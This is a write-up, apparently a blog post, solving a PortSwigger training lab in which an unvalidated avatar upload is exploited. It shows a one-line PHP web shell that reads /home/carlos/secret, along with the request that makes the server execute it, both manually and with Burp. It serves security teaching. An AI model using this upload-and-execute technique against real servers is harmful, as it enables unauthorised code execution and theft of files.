8.1 Lab: Remote code execution via web shell upload | 2023
This Lab contains a vulnerable image upload function. It doesn’t perform any validation on the files upload before storing on the server, To solve the lab, upload a basic PHP web shell to exfiltrate the contents of /home/carlos/secret | Karthikeyan Nagaraj
Description
This lab contains a vulnerable image upload function. It doesn’t perform any validation on the files users upload before storing them on the server’s filesystem.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret
. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
1. Solution without Burpsuite
- Log in to the page using the credentials
wiener:peter
- There is an Image upload functionality, where we can upload files
- If you try to upload an image, then right-click and open the image in a new tab, you can see the URL of the image which is below
https://LAB-ID.web-security-academy.net/files/avatars/image1.png
4. So, In any file upload Functionality, if the uploaded file is not validated, there is a higher chance of exploiting the Vulnerability
5. Here, let us inject a payload via the upload functionality
6. Save the below code in a file with ANYNAME.php
Ex: exploit.php
<?php echo file_get_contents('/home/carlos/secret'); ?>
7. Now upload the File and do the step 3 process
8. You will now able to see a Secret Key
9. Submit the secret Key in Submit Solution to solve the Lab
2. Portswigger’s Solution
- While proxying traffic through Burp, log in to your account and notice the option for uploading an avatar image.
- Upload an arbitrary image, then return to your account page. Notice that a preview of your avatar is now displayed on the page.
- In Burp, go to Proxy > HTTP history. Click the filter bar to open the Filter settings dialog. Under Filter by MIME type, enable the Images checkbox, then apply your changes.
- In the proxy history, notice that your image was fetched using a
GET
request to/files/avatars/<YOUR-IMAGE>
. Send this request to Burp Repeater. - On your system, create a file called
exploit.php
, containing a script for fetching the contents of Carlos's secret file. For example:
<?php echo file_get_contents('/home/carlos/secret'); ?>
6. Use the avatar upload function to upload your malicious PHP file. The message in the response confirms that this was uploaded successfully.
7. In Burp Repeater, change the path of the request to point to your PHP file:
GET /files/avatars/exploit.php HTTP/1.1
8. Send the request. Notice that the server has executed your script and returned its output (Carlos’s secret) in the response.
9. Submit the secret to solve the lab.
If you would like to support me so that I could create more free content — https://www.buymeacoffee.com/cyberw1ng
Thank you for Reading!
Happy Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng
Telegram Channel for Ethical Hacking Dumps — https://t.me/ethicalhackingessentials